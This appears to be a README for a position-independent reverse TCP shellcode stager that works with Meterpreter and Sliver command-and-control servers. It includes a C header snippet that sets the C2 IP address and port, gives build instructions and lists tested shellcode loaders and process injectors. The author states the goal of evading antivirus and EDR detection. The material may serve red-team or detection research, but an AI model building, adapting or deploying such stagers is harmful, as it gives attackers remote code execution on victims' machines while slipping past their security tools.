A modern 64-bit position independent Meterpreter and Sliver compatible reverse_TCP staging shellcode based on Cracked5pider's Stardust
```c
#include <Common.h>
#include <Constexpr.h>
#pragma comment(lib, "ws2_32.lib")
LPWSTR* arglist;
// Define the IP address of your C2 stager (!)
#define IP_STR "10.10.10.10"
// Define port 443 of your TCP stager
#define PORT 443
...
```
I wanted to improve my understanding of position independent shellcode. Besides that, my Meterpreter reverse_TCP stager gets caught by a lot of AV/EDRs, and I was hoping to somehow get around the IoCs of the 15-year-old Meterpreter reverse_TCP shellcode generated by msfvenom. Inspirations were:
- https://github.com/SherifEldeeb/TinyMet
- https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm

- Since htons and htonl are not available, their results have been hardcoded
- A custom inet_addr function was rewritten and implemented in Main.c
- Socket creation and interaction functions have been imported from ws2_32.dll
- The Meterpreter staging logic has been copied from the original project and TinyMet

- Git clone the repository
- Change the IP and port in Main.c
- Disable the message box right before the stage 2 shellcode execution (if it bothers you)
- Run make
- Use your favourite shellcode loader/injector. I successfully tested:
  - https://github.com/Cipher7/ChaiLdr
  - https://github.com/florylsk/ExecIT
  - https://github.com/3xpl01tc0d3r/ProcessInjection
  - the original Stardust loader written by Cracked5pider